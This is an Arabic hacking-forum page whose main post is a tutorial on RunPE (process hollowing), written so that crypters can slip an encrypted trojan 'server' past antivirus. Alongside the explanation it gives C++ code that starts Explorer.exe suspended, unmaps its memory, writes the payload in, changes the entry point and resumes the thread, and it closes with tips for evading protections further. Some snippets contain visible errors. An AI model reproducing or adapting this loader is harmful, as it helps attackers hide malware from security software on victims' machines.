منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات
عزيزي الزائر عزيزتي الزائرة يرجي التكرم بتسجبل الدخول
لي اجل تستطيع اطهار جميع المواضيع والاقسام
اذا كنت عضو معنا

او التسجيل ان لم تكن عضو وترغب في الانضمام الي المنتدي

نتشرف بتسجيل

ادارة المنتدى
منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات
عزيزي الزائر عزيزتي الزائرة يرجي التكرم بتسجبل الدخول
لي اجل تستطيع اطهار جميع المواضيع والاقسام
اذا كنت عضو معنا

او التسجيل ان لم تكن عضو وترغب في الانضمام الي المنتدي

نتشرف بتسجيل

ادارة المنتدى
منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.


منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقاأكبر منتدى هكر عربي متخصص بجديد الثغرات واختراق المواقع والأجهزة.منتدى إختراق البريد والايميلات- قسم اختراق دورة إحتراف التلغيمدورة اختراق IPs من نوع SIPو VOIP‎دورة كشف التلغيم‎دورة اختراق الأجهزة‎دورة
 
الرئيسيةأحدث الصورالتسجيلدخول


تحياتي لك الباب مفتوح لي في جميع الاقسام الذي تريده عند المشاركه  اي استفسار انا جاهز ان شاء الله
بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم
سحابة الكلمات الدلالية
المواضيع الأخيرة
» انشاء ./payload
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Icon_minitimeالأربعاء أغسطس 11, 2021 12:03 pm من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» دروس تعلم فنون الهكرز للمبتدئين
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Icon_minitimeالجمعة ديسمبر 29, 2017 1:33 pm من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» اقوى كود ازالة حسابات الفيس بوك
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Icon_minitimeالجمعة ديسمبر 29, 2017 1:27 pm من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» عملاق التحميل من التورنت Vuze 5.6.0.0 الجديد كليا واحدث الادوات والاصدرات
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Icon_minitimeالسبت مارس 07, 2015 11:36 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» برنامج FastPictureViewer 1.9 Build 342 لتعديل و عرض الصور بكل سهوله
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Icon_minitimeالأربعاء مارس 04, 2015 3:57 pm من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» احدث فلود اضافات روم 2015
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Icon_minitimeالأربعاء مارس 04, 2015 10:20 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]VB6[ أفضل الطرق لتجميل برامجك شبكة الجنرال صدام الشرعبي
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Icon_minitimeالثلاثاء مارس 03, 2015 10:58 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» الدرس الثالث -الجمل الشرطية و الدوارات شبكة الجنرال صدام الشرعبي
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Icon_minitimeالثلاثاء مارس 03, 2015 10:55 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» الدرس الثاني -المتغيرات شبكة الجنرال صدام الشرعبي
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Icon_minitimeالثلاثاء مارس 03, 2015 10:53 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]#C[ الدرس الاول تعلم خطوة بخطوة , مع الإجابة عن أي سؤال شبكة الجنرال صدام الشرعبي
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Icon_minitimeالثلاثاء مارس 03, 2015 10:52 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]C#[ الخطوه الثانية اضافةالبيانات بالـ LINQ شبكة الجنرال صدام الشرعبي
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Icon_minitimeالثلاثاء مارس 03, 2015 10:47 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]C#[ الخطوه الاولى لأستيعاب الـ LINQ شبكة الجنرال صدام الشرعبي
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Icon_minitimeالثلاثاء مارس 03, 2015 10:45 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]#C[ عمل برامج للاجهزه النقاله والPDA‏ شبكة الجنرال صدام الشرعبي
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Icon_minitimeالثلاثاء مارس 03, 2015 10:41 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

نوفمبر 2024
الإثنينالثلاثاءالأربعاءالخميسالجمعةالسبتالأحد
    123
45678910
11121314151617
18192021222324
252627282930 
اليوميةاليومية
التبادل الاعلاني

انشاء منتدى مجاني



أفضل 10 فاتحي مواضيع
ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_rcap1RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Voting_barRunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_lcap1 
جنـرال الـهكـر
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_rcap1RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Voting_barRunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_lcap1 
رابح..زيرؤ.فؤر.ايفر
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_rcap1RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Voting_barRunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_lcap1 
ابوعلي
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_rcap1RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Voting_barRunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_lcap1 
سنايبر1
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_rcap1RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Voting_barRunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_lcap1 
ملك الهكر
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_rcap1RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Voting_barRunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_lcap1 
العاشق
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_rcap1RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Voting_barRunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_lcap1 
الساحر
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_rcap1RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Voting_barRunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_lcap1 
__alsafa7__
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_rcap1RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Voting_barRunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_lcap1 
صدام الشرعبي
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_rcap1RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Voting_barRunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_lcap1 
أفضل 10 أعضاء في هذا المنتدى
ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے - 1851
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_rcap1RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Voting_barRunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_lcap1 
رابح..زيرؤ.فؤر.ايفر - 300
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_rcap1RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Voting_barRunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_lcap1 
جنـرال الـهكـر - 227
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_rcap1RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Voting_barRunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_lcap1 
سنايبر1 - 146
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_rcap1RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Voting_barRunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_lcap1 
ابوعلي - 55
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_rcap1RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Voting_barRunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_lcap1 
العاشق - 49
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_rcap1RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Voting_barRunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_lcap1 
نسيـم البحـر1 - 27
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_rcap1RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Voting_barRunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_lcap1 
ملك الهكر - 27
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_rcap1RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Voting_barRunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_lcap1 
لووورد اليمن - 24
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_rcap1RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Voting_barRunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_lcap1 
__alsafa7__ - 18
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_rcap1RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Voting_barRunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Vote_lcap1 
تسجيل صفحاتك المفضلة في مواقع خارجية
تسجيل صفحاتك المفضلة في مواقع خارجية reddit      

https://sadam-alsharabi.roo7.biz

قم بحفض و مشاطرة الرابط منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات على موقع حفض الصفحات
تصويت
احصائيات
هذا المنتدى يتوفر على 2284 عُضو.
آخر عُضو مُسجل هو Mahrr فمرحباً به.

أعضاؤنا قدموا 3052 مساهمة في هذا المنتدى في 2055 موضوع

 

 RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات

اذهب الى الأسفل 
كاتب الموضوعرسالة
ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے


السٌّمعَة : 47
تاريخ التسجيل : 19/11/2012
العمر : 34
الموقع : https://m.facebook.com/profile.php?id=465134066889659

RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Empty
مُساهمةموضوع: RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات   RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات Icon_minitimeالثلاثاء فبراير 05, 2013 9:23 pm

img]http://im14.gulfup.com/k6v01.png[/img]

RunPE
أولا وللعلم لن أقوم بشرح الموضوع خطوة خطوة بل سأشرح اساس الرن بي فعلى كل من يريد فهم الموضوع أن يكون ملم بالدوال المهمة والأساسية .

أولا وكما نعرف بأن برامج تشفير الـ Runtime تعمل بآلية الرن بي 
فماهو الرن بي ؟

الرن بي هو تنفيذ بايتات الملف المطلوب في ذاكرة ملف آخر 
لأوضح أكثر لدينا بايتات السيرفر في الستب مشفره بأحد الخوارزميات السيرفر حتى الآن لم يتم تشغيله لذلك لاتوجد أي عملية ضارة تجعل برنامج الحماية يعطي إنذار عليها 

فالرن بي يقوم بتحميل [ تشغيل ] عملية نظيفة مثل Explorer.exe عن طريقة دالة CreateProcess لماذا سنستخدم هذه الدالة لأننا في تشغيل هذا الملف لانريده أن يعمل بل نريد أن يتم تحميله للذاكرة بوضيعة الخمول أو CREATE_SUSPENDED
وهذه الدالة توفر بارميتر ال Create Flags وهو وضع التشغيل 

للمزيد : MSDN CreateProcess

إنتهينا من جزء تحميل الملف النظيف للذاكرة وأيضا هنا لن تشعر الحماية بأي خطر لأن العملية خالية من الاعمال الضارة تماما والملف لم يتم تنفيذه أي لم يتمر المرور بالإنتري بوينت بعد
وهذا مانريده 

الآن يجب ان نجلب ال ImageBase من ذاكرة العملية لانه مهم في الخطوات القادمة 
1 - يمكنك جلبه عن طريق الـ PE Header . 
وتوجد ستركشرات مهمة جدا لابد أن نتطرق لها 
وهي 
IMAGE_DOS_HEADER
IMAGE_NT_HEADER
IMAGE_SECTION_HEADER

ويفضل أن تدرس تركيب ال PE Files والستركشرز الخاصة به قبل الشروع في برمجة رن بي
لكي تكون على علم بكل خطوة تقوم بها .

2 - ويمكن جلبه عن طريق جلب الـ EBX وإضافته إلى 8 [ EBX + 8 ] .

سنستخدم هذه الطريقة في درسنا هذا لاكن كيف نجلب الـ EBX ؟
دالة GetThreadContext تقوم بالعمل 
وذلك عن طريق إسناد 
Context Flags = CONTEXT_FULL

ووظيفة هذه الدالة هي جلب الـ Registers [ مسجلات الذاكرة ] الموجودة في العملية 
EAX,EBX,ESP .... وأيضا المسجلات الفرعية ولها عدة Flags

مايهمنا هنا هو جلب مسجل EBX لكي نجلب الـ ImageBase عن طريقه
بعد أن جلبنا الـ ImageBase ماذا يتبقى ؟


الآن نأتي لدور تفريغ الذاكرة الإفتراضية للعملية وذلك لنجعلها فارغة مهيئة لكتابة بايتات السيرفر الخاص بنا فيها وذلك يتم عن طريق دالة NtUnmapViewOfSection ويتم التفريغ بدءآ من الـ ImageBase اللذي قمنا بجلبه 

بعد تفريق ذاكرة العملية لازال علينا تفريغ مساحة كافية فيها لكتابة بايتات السيرفر أو الملف المطلوب وذلك عن طريق دالة VirtualAllocEx
وذلك يتم بدءآ من ال ImageBase الخاص ببايتات الملف او السيرفر ونستطيع جلبه عن طريق
IMAGE_NT_HEADER->OptionalHeader.ImageBase
ونستطيع جلب المساحة عن طريق IMAGE_NT_HEADER->OptionalHeader.SizeOfImage
بعد أن تم تهييئ ذاكرة العملية تماما نقوم الآن بفك تشفير بايتات السيرفر او الملف المطلوب ان كان مشفر بأحد الخوارزميات ونبدء بكتابة الـ Headers الخاصة بالملف 
عن طريق دالة WriteProcessMemory 
وذلك بتحديد حجم الهيدر والموجود حجمها ايضا في الإوبشنال هيدر ونبدء كتابته من ال ImageBase الخاص بالملف او السيرفر ونستطيع جلب حجم الهيدرس عن طريق
IMAGE_NT_HEADER->OptionalHeader.SizeOfHeaders

والآن بعد أن انتهينا من كتابة الهيدرس نكتب باقي اجزاء الملف أي ال Sections 
وذلك عن طريق الدخول في حلقة تكرار وأفضل هذه الطريقة 
وفي كل مرة نقوم بإسناد السكشن الحالي لستركشر IMAGE_SECTION_HEADER
وذلك عن طريق :
كود:
[FileBytes[PIMAGE_DOS_HEADER->e_lfanew + sizeof(IMAGE_NT_HEADERS) + sizeof(PIMAGE_SECTION_HEADER) * i];


ويرمز i إلى عداد الحلقة ويبدء من الصفر وبعد أن نقوم بإسناد السكشن للستركشر
نبدء بكتابته عن طريق WriteProcessMemory
ويتم ذلك بدءآ من

IMAGE_NT_HEADERS->OptionalHeader.ImageBase + IMAGE_SECTION_HEADER->VirtualAddress

أي من حيث إنتهت كتابة الراو داتا الاخيرة 
وما يتم كتابته هو مآيؤشر له الستركشر بالنسبة لبايتات الملف 
[ FileBytes[IMAGE_SECTION_HEADER.PointerToRawData
والحجم يكون بحجم الراو داتا الحالية ويحمله السترشكر ذاته أيضا
IMAGE_SECTION_HEADER.SizeOfRawData


والآن بعد أن انتهينا من كتابة كافة البيانات نأتي لآخر الخطوات وأهمها وهي إسناد ال OEP الجديد اللذي سيبدء منه الملف ويتم حسابه عن طريق جمع ال ImageBase + EntryPoint
علما أن مسجل Eax هو من يحمل هذه القيمة ليتم تنفيذ الملف منها

وكما فعلنا سابقا نجلب ال ImageBase 
IMAGE_NT_HEADER->OptionalHeader.ImageBase + IMAGE_NT_HEADER->OptionalHeader.AddressOfEntryPoint

ونسندهم للـ Context السابق اللذي جلبناه عن طريق دالة GetThreadContext 
ثم نقول بإسناد المسجلات مرة اخرى للعملية عن طريق دالة 
SetThreadContext 

وأخيرا نرجع العملية للعمل بوضعها الطبيعي عن طريقة دالة 
ResumeThread
ولاكن لابد من وجود عدة أمور أيضا في الرن بي وهي تعريف الستركشر وغيرها والتحقق من بعض الإمور لكي يعمل بشكل سليم لذلك لنأتي للخلاصة من الموضوع وماتوصلنا إليه ( الكود C++ )

1 - تعريف الستركشرات والمتغير اللذي سيحمل بايتات الملف
كود:
LPBYTE lpBuffer;
 PIMAGE_DOS_HEADER IDH;
 PIMAGE_NT_HEADERS INH;
 PIMAGE_SECTION_HEADER ISH;
ونسند بايتات الملف للستركشرات ونتحقق من أنها بايتات صالحة وتحتوي على تواقيع صالحة
IDH = (PIMAGE_DOS_HEADER)&lpBuffer[0];
 if (IDH->e_magic != IMAGE_DOS_SIGNATURE) { return 0;}
 INH = (PIMAGE_NT_HEADERS)&lpBuffer[IDH->e_lfanew];

 if (INH->Signature != IMAGE_NT_SIGNATURE) { return 0;}
2 - نبدء في تحميل العملية النظيفة عن طريق دالة CreateProcess ونعرف متغيراتها

PROCESS_INFORMATION pi;
STARTUPINFO si;
ZeroMemory(&si,sizeof(si));
si.cb = sizeof(si);

CreateProcess(L"Explorer.exe",NULL,NULL,NULL,FALSE ,0x0000004,NULL,NULL,&si,&pi)

بعد ان نتحقق من انه تم تحميل العملية 
3 - نجلب المسجلات في العملية عن طريق دالة GetThreadContext
كود:
CONTEXT context;
 context.ContextFlags = (CONTEXT_FULL);
GetThreadContext(pi.hThread,&context)
بعد أن نتحقق من انه تم جلب المسجلات

4 - نحسب الـ ImageBase عن طريق جمع EBX + 8 

كود:
DWORD dwImageBase;
كود:
ReadProcessMemory(pi.hProcess, LPCVOID(context->Ebx + 8), LPVOID(&dwImageBase), 4, NULL);


ثم نقوم بتفريغ الذاكرة عن طريقة
دالة NtUnmapViewOfSection

بمآ ان الدالة Native سنستخدم بوينتر لها نعرف في الجينيرال سيكشن
كود:
typedef LONG(WINAPI *NtUnmapViewOfSection)(HANDLE hProcess,LPVOID BaseAddress);
ونحميل الدالة له ونقوم بتفريغ الذاكرة بدءآ من ال ImageBase

 NtUnmapViewOfSection xNtUnmapViewOfSection;
xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
xNtUnmapViewOfSection(pi.hProcess, PVOID(dwImageBase));

وبعد أن يتم تفريغ الذاكرة 
5 - نقوم بتفريغ المساحة الكافية في العملية عن طريقة دالة VirtualAllocEx
بدءا من ال ImageBase الجديد 
 VirtualAllocEx(pi.hProcess,(LPVOID)INH->OptionalHeader.ImageBase,INH->OptionalHeader.SizeOfImage,MEM_COMMIT || MEM_RESERVE,PAGE_EXECUTE_READWRITE);
وبعد أن قمنا بتفريغ المساحة الكافية 
6 - نبدء في كتابة البايتات او [ الهيدرات تحديدا ] عن طريق دالة WriteProcessMemory

WriteProcessMemory(pi.hProcess,(LPVOID)INH->OptionalHeader.ImageBase,&lpBuffer[0],INH->OptionalHeader.SizeOfHeaders,NULL);
بعد أن تمت كتابة الهيدرات نقوم بكتابة السكشنس عن طريق حلقة التكرار وإسناد كل سكشن لستركشر السكشن هيدر في كل مرة 
for (int i=0;iFileHeader.NumberOfSections;i++)
 {
 
 ISH = (PIMAGE_SECTION_HEADER)&lpBuffer[IDH->e_lfanew + sizeof(PIMAGE_NT_HEADERS) + sizeof(PIMAGE_SECTION_HEADER) * i];

 WriteProcessMemory(pi.hProcess,(LPVOID)(INH->OptionalHeader.ImageBase + ISH->VirtualAddress),&lpBuffer[ISH->PointerToRawData],ISH->SizeOfRawData,NULL);
 }
بعد ان تمت كتابة جميع بايتات الملف وتركيباته 
7 - نبدء في حساب ال OEP الجديد عن طريق جمع ال ImageBase + EntryPoint
وثم إسنادهم لـ Eax لكي يبدء الملف منها عند اعادته للعمل
كود:
 context.Eax = INH->OptionalHeader.ImageBase + INH->OptionalHeader.AddressOfEntryPoint;
 SetThreadContext(pi.hThread,&context);
8 - والخطوة الأخيرة إعادة العملية للعمل عن طريق دالة ResumeThread
ResumeThread(pi.hThread);

بالنسبة لتشفير الرن بي وهنا يأتي دور فكر المبرمج وإبداعه ومن الأمثلة اللجوء للبديل 
مثل ال Native من الدوال أو حتى اللجوء للـ Sysenter مباشرة كما يمكنك إستخدام البوينتر للدوال وله تأثير على الحمايات 

في الختام أتمنى أن يكون الشرح واضح لمن يهتم بهذا المجال ولمن له طموح عالي فيه 
أتمنى أن يصل له وجميع من يتمنى أن يطور نفسه بشكل أوسع وأكبر في هذا البحر العظيم
ولاتملوا من البحث وتحصيل العلم ففي النهاية ستحصد نتيجة تعبك وإجتهادك في ماتحب .

وإن شاء الله ينال على إعجابكم أعتقد إنه أول شرح عربي من نوعه 
وأهديكم أيضا كتاب من شركة F-Secure عن الستركشرات في تركيب ال PE Files

http://www.gulfup.com/?OdlgAc

الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://sadam-alsharabi.roo7.biz
 
RunPE - ماهو الرن بي وكيفية برمجته وبعض الأساسيات
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» Coder Engine إدخل كيف تعرف ماهو
» تعريف المتغيرات وبعض الدوال للغة الـــــ c
» جميع اوامر الباك تراك5 ار3 لاختراق الاجهزة وبعض البرامج التنصيب

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات :: الفئة الأولى :: قسم اختراق الاجهزه-
انتقل الى: